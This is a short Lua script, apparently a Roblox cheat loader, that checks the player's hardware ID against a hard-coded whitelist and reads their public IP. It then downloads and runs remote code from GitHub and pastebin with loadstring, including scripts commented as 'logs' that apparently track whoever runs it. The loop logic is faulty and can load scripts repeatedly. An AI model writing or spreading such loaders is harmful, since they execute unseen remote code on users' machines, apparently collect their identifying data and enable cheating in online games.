local HWIDTable = {
"F9027583-6086-47E7-8025-26CF76A0E8AD", --my HWID
"83AF5A2B-F4CD-4838-8BC0-3422621C5F7F", -- lxstunknown
"58FAC82F-53F0-44FE-82AC-5325630E4C68", -- kowalik
"481B9F95-D76E-4362-9E2B-4F32EEB76AE6" -- LxstHO4X
}

local IP = game:HttpGet('https://api.ipify.org', true)
local HWID = game:GetService("RbxAnalyticsService"):GetClientId()

for i,v in pairs(HWIDTable) do
    if v == HWID then
        loadstring(game:HttpGet(('https://raw.githubusercontent.com/Sashkotashko420/wowwowowowpremium/main/mainpremium')))()
        loadstring(game:HttpGet(('https://pastebin.com/raw/GruttHf6')))() -- premium logs
    else
        loadstring(game:HttpGet(('https://raw.githubusercontent.com/Sashkotashko420/wowwowowow/main/mainfree')))()
        loadstring(game:HttpGet(('https://pastebin.com/raw/TAQrzzv2')))() -- logs
    end
end
